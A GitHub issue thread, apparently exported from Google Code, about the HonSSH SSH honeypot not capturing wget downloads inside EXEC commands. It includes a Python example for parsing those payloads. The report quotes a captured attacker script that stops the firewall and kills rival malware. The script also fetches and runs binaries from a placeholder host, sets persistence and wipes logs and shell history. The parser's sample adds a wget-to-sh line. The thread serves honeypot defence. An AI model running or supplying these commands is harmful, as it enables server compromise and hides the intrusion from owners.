tnich / honssh

HonSSH is designed to log all SSH communications between a client and server.
https://github.com/tnich/honssh
BSD 3-Clause "New" or "Revised" License
372 stars 71 forks

HonSSH ignores wget inside EXEC commands #17

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
What steps will reproduce the problem?
1. The attacker has found the login to the honeypot

2. The attacker executes a series of commands while logging in (I've seen more 
and more of this behavior lately), some of which include wget command(s); 
the files are not caught by HonSSH.

Example:

    ssh -l root blacks.trollpot.biteme /etc/init.d/iptables stop
    echo "nameserver 8.8.8.8" >> /etc/resolv.conf
    echo "nameserver 8.8.4.4" >> /etc/resolv.conf
    yum -y install wget
    chmod 7777 / etc
    killall -9 .IptabLes
    killall -9 nfsd4
    killall -9 profild.key
    cd /etc;rm -rf dir fake.cfg
    killall -9 nfsd
    killall -9 DDosl
    killall -9 lengchao32
    killall -9 b26
    killall -9 Bill
    killall -9 n26
    killall -9 1
    killall -9 codelove
    killall -9 32
    killall -9 m32
    killall -9 m64
    killall -9 64
    killall -9 83BOT
    killall -9 82BOT
    killall -9 dos64
    killall -9 dos32
    killall -9 new6
    killall -9 new4
    killall -9 node24
    killall -9 mimi
    killall -9 nodeJR-1
    killall -9 freeBSD
    killall -9 ksapdd
    killall -9 kysapdd
    killall -9 sksapdd
    killall -9 xsw
    killall -9 syslogd
    killall -9 skysapdd
    killall -9 cupsddd
    killall -9 ksapd
    killall -9 atddd
    killall -9 xfsdxd
    cd /root; chmod 7777 / etc
    killall -9 minerd
    killall -9 0
    killall -9 joudckfr
    killall -9 www
    killall -9 log
    killall -9 .IptabLex
    killall -9 .Mm2
    killall -9 acpid
    killall -9 m64
    killall -9 ./QQ
    killall -9 QQ
    killall -9 g3
    killall -9 2
    killall -9 3
    killall -9 pm
    killall -9 qweasd
    killall -9 tangtang
    killall -9 imap-login
    killall -9 cupsdd
    killall -9 xudp
    killall -9 txma
    killall -9 mrdos64.b00
    killall -9 mrdos32.b00
    killall -9 kkpklp
    killall -9 kiilp
    killall -9 xin1
    killall -9 jibateng
    cd /root;rm -rf dir nohup.out
    cd /etc;rm -rf dir cupsddd
    cd /etc;rm -rf dir atddd
    cd /etc;rm -rf dir ksapdd
    cd /etc;rm -rf dir kysapdd
    cd /etc;rm -rf dir sksapdd
    cd /etc;rm -rf dir skysapdd
    cd /etc;rm -rf dir xfsdxd
    cd /etc;rm -rf dir fake.cfg
    cd /etc;rm -rf dir cupsdd
    cd /etc;rm -rf dir cupsdd.*
    cd /etc;rm -rf dir cupsddd.*
    cd /etc;rm -rf dir atddd.*
    cd /etc;rm -rf dir ksapdd.*
    cd /etc;rm -rf dir kysapdd.*
    cd /etc;rm -rf dir sksapdd.*
    cd /etc;rm -rf dir skysapdd.*
    cd /etc;rm -rf dir xfsdxd.*
    cd /etc;rm -rf dir cupsdd
    cd /etc;rm -rf dir atdd
    cd /etc;rm -rf dir ksapd
    cd /etc;rm -rf dir kysapd
    cd /etc;rm -rf dir sksapd
    cd /etc;rm -rf dir skysapd
    cd /etc;rm -rf dir xfsdx
    cd /etc;rm -rf dir fake.cfg
    cd /etc;rm -rf dir cupsdd.*
    cd /etc;rm -rf dir atdd.*
    cd /etc;rm -rf dir ksapd.*
    cd /etc;rm -rf dir kysapd.*
    cd /etc;rm -rf dir sksapd.*
    cd /etc;rm -rf dir skysapd.*
    cd /etc;rm -rf dir xfsdx.*
    cd /var/spool/cron; rm -rf dir root.*
    cd /var/spool/cron; rm -rf dir root
    cd /var/spool/cron/crontabs; rm -rf dir root.*
    cd /var/spool/cron/crontabs; rm -rf dir root
    cd /var/spool/cron ;wget http://sketchy.ip.address/root
    cd /var/spool/cron/crontabs ;wget http://sketchy.ip.address/root
    cd /etc;wget http://sketchy.ip.address/cupsdd
    cd /etc;wget http://sketchy.ip.address/ksapdd
    cd /etc;wget http://sketchy.ip.address/kysapdd
    cd /etc;wget http://sketchy.ip.address/atddd
    cd /etc;wget http://sketchy.ip.address/skysapdd
    cd /etc;wget http://sketchy.ip.address/sksapdd
    cd /etc;wget http://sketchy.ip.address/xfsdxd
    cd /etc;chmod 7777 xfsdxd
    cd /etc;chmod 7777 atddd
    cd /etc;chmod 7777 cupsdd
    cd /etc;chmod 7777 ksapdd
    cd /etc;chmod 7777 kysapdd
    cd /etc;chmod 7777 skysapdd
    cd /etc;chmod 7777 sksapdd
    nohup /etc/xfsdxd > /dev/null 2>&1&
    nohup /etc/cupsdd > /dev/null 2>&1&
    nohup /etc/ksapdd > /dev/null 2>&1&
    nohup /etc/kysapdd > /dev/null 2>&1&
    nohup /etc/atddd > /dev/null 2>&1&
    nohup /etc/skysapdd > /dev/null 2>&1&
    nohup /etc/sksapdd > /dev/null 2>&1&
    echo "cd /etc;./ksapdd" >> /etc/rc.local
    echo "cd /etc;./kysapdd" >> /etc/rc.local
    echo "cd /etc;./atddd" >> /etc/rc.local
    echo "cd /etc;./ksapdd" >> /etc/rc.local
    echo "cd /etc;./skysapdd" >> /etc/rc.local
    echo "cd /etc;./xfsdxd" >> /etc/rc.local
    echo "unset MAILCHECK" >> /etc/profile
    cd /etc;chattr +i cupsdd
    cd /etc;chattr +i cupsdd
    cd /etc;chattr +i cupsdd
    cd /etc;chattr +i cupsdd
    cd /etc;chattr +i cupsdd
    rm -rf /root/.bash_history
    touch /root/.bash_history
    history -r
    cd /var/log > dmesg
    cd /var/log > auth.log
    cd /var/log > alternatives.log
    cd /var/log > boot.log
    cd /var/log > btmp
    cd /var/log > cron
    cd /var/log > cups
    cd /var/log > daemon.log
    cd /var/log > dpkg.log
    cd /var/log > faillog
    cd /var/log > kern.log
    cd /var/log > lastlog
    cd /var/log > maillog
    cd /var/log > user.log
    cd /var/log > Xorg.x.log
    cd /var/log > anaconda.log
    cd /var/log > yum.log
    cd /var/log > secure
    cd /var/log > wtmp
    cd /var/log > utmp
    cd /var/log > messages
    cd /var/log > spooler
    cd /var/log > sudolog
    cd /var/log > aculog
    cd /var/log > access-log
    cd /root > .bash_history
    history -c
    echo

What is the expected output?
There are a number of files being downloaded here 
(http://sketchy.ip.address/[filename])
that I would expect to be downloaded by HonSSH.

What do you see instead?
Only what is shown above.

What version of the product are you using? On what operating system?
b9880b4e367b

Please provide any additional information below.
Not sure if this is caused by running the commands at login, by there being 
multiple wget commands, or something else.

Original issue reported on code.google.com by are.hans...@gmail.com on 10 Mar 2014 at 10:29

GoogleCodeExporter commented 9 years ago
Thanks man :D

Original comment by tnn...@googlemail.com on 11 Mar 2014 at 6:05

GoogleCodeExporter commented 9 years ago

Original comment by tnn...@googlemail.com on 16 Mar 2014 at 4:55

GoogleCodeExporter commented 9 years ago
Should be fixed. Multiple wget commands will be recognized and pulled down, 
both in normal and EXEC usage.

Also added support for user and password wget flags :)

Original comment by tnn...@googlemail.com on 16 Mar 2014 at 5:51
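An added illustration of the parsing problem this thread describes (example code written for this page, not HonSSH's own implementation): the EXEC payload quoted in the report is one string with embedded newlines, with several simple commands per line joined by `;` and `&&`, and `wget` both appears as a real download command and as an argument to `yum`. The example assumes the payload arrives as that single string, splits it into simple commands, and reports every wget invocation with its URL(s) and any `--user`/`--password`/`--http-user`/`--http-password`/`-O` flags (the flag names are wget's documented ones). `SAMPLE_EXEC` is a constructed, abridged copy of the quoted payload; the line with credential flags, `-qO-`, a bare host and `| sh` is an addition to exercise the option handling and is not from the original traffic.

```python
"""Find wget invocations inside a multi-command SSH EXEC payload.
Example written for this issue, not HonSSH's own code. Assumes the EXEC
payload is one string with embedded newlines, as quoted in the report."""
import shlex

SEPARATORS = {';', '&&', '||', '|', '&'}               # end one simple command
REDIRECTS = {'>', '>>', '<', '>&', '&>', '<<', '>|'}   # next token is a file, not an arg
# wget options whose value is the next argv element (long forms also take --opt=value)
VALUE_OPTIONS = {
    '-O', '--output-document', '-o', '--output-file', '-a', '--append-output',
    '-P', '--directory-prefix', '-t', '--tries', '-T', '--timeout', '-w', '--wait',
    '-U', '--user-agent', '-i', '--input-file', '--header', '--post-data',
    '--limit-rate', '--user', '--password', '--http-user', '--http-password',
    '--ftp-user', '--ftp-password',
}
OPTION_KEYS = {  # the options we report back, mapped onto result keys
    '--user': 'user', '--http-user': 'user', '--ftp-user': 'user',
    '--password': 'password', '--http-password': 'password', '--ftp-password': 'password',
    '-O': 'output', '--output-document': 'output',
}

# Constructed sample: an abridged copy of the payload quoted in the report, plus
# one line (credential flags, -qO-, bare host, pipe to sh) added to exercise the
# option parsing. None of it is real traffic.
SAMPLE_EXEC = (
    "/etc/init.d/iptables stop\n"
    'echo "nameserver 8.8.8.8" >> /etc/resolv.conf\n'
    "yum -y install wget\n"
    "cd /var/spool/cron ;wget http://sketchy.ip.address/root\n"
    "cd /var/spool/cron/crontabs ;wget http://sketchy.ip.address/root\n"
    "cd /etc;wget http://sketchy.ip.address/cupsdd\n"
    "cd /etc;wget http://sketchy.ip.address/ksapdd && chmod 7777 ksapdd\n"
    "wget --user=bob --password=hunter2 -qO- sketchy.ip.address/x | sh\n"
    "nohup /etc/cupsdd > /dev/null 2>&1&\n"
    "history -c\n"
)


def tokenize(line):
    """Shell-style tokens; ';', '&&', '|', '>' etc. become their own tokens.
    On an unbalanced quote fall back to whitespace splitting rather than
    dropping the line, so a malformed command cannot hide a download."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True   # keeps 'http://host/path' as one token
    lex.commenters = ''           # a '#' inside a URL is not a comment
    try:
        return list(lex)
    except ValueError:
        return line.split()


def split_commands(exec_string):
    """Yield argv lists, one per simple command, splitting on newlines and
    separators; redirections (and a leading fd number such as 2>&1) are dropped."""
    for line in exec_string.splitlines():
        toks, argv, i = tokenize(line) + [';'], [], 0
        while i < len(toks):
            tok = toks[i]
            if tok in REDIRECTS:                                     # '> file'
                i += 2
            elif tok.isdigit() and i + 1 < len(toks) and toks[i + 1] in REDIRECTS:
                i += 3                                               # '2>&1'
            elif tok in SEPARATORS:
                if argv:
                    yield argv
                argv, i = [], i + 1
            else:
                argv.append(tok)
                i += 1


def _url(tok):
    # wget treats a bare host/path as http; normalise so a fetcher gets a full URL
    return tok if '://' in tok else 'http://' + tok


def parse_wget(argv):
    """Return {'urls', 'user', 'password', 'output'} for a wget argv, or None
    when argv is not a wget command ('yum -y install wget' is not)."""
    if not argv or argv[0].rsplit('/', 1)[-1] != 'wget':
        return None
    info = {'urls': [], 'user': None, 'password': None, 'output': None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok == '--':                                  # everything after is a URL
            info['urls'].extend(_url(t) for t in argv[i + 1:])
            break
        if tok.startswith('--'):
            name, eq, value = tok.partition('=')
            if name in VALUE_OPTIONS and not eq and i + 1 < len(argv):
                i += 1
                value = argv[i]
            if name in OPTION_KEYS:
                info[OPTION_KEYS[name]] = value
        elif tok.startswith('-') and len(tok) > 1:       # short options, maybe bundled: -qO-
            for j in range(1, len(tok)):
                name = '-' + tok[j]
                if name in VALUE_OPTIONS:
                    value = tok[j + 1:]
                    if not value and i + 1 < len(argv):
                        i += 1
                        value = argv[i]
                    if name in OPTION_KEYS:
                        info[OPTION_KEYS[name]] = value
                    break
        else:
            info['urls'].append(_url(tok))
        i += 1
    return info


def extract_wget(exec_string):
    """Every wget invocation in the payload, in order, repeats included:
    the honeypot should record each attempt, not just distinct URLs."""
    hits = [parse_wget(argv) for argv in split_commands(exec_string)]
    return [h for h in hits if h and h['urls']]


def unique_urls(exec_string):
    """Distinct URLs in first-seen order, i.e. what actually needs fetching."""
    return list(dict.fromkeys(u for h in extract_wget(exec_string) for u in h['urls']))
```

Running `extract_wget(SAMPLE_EXEC)` yields five hits (the two fetches of `/root` are both reported, since each is a separate attempt worth logging) while `yum -y install wget` is correctly ignored; `unique_urls` collapses them to the four distinct URLs a downloader would need to pull. Matching on the basename of argv[0] also catches `/usr/bin/wget`, and the `2>&1`/`| sh` handling keeps redirect targets and downstream commands from being mistaken for URLs.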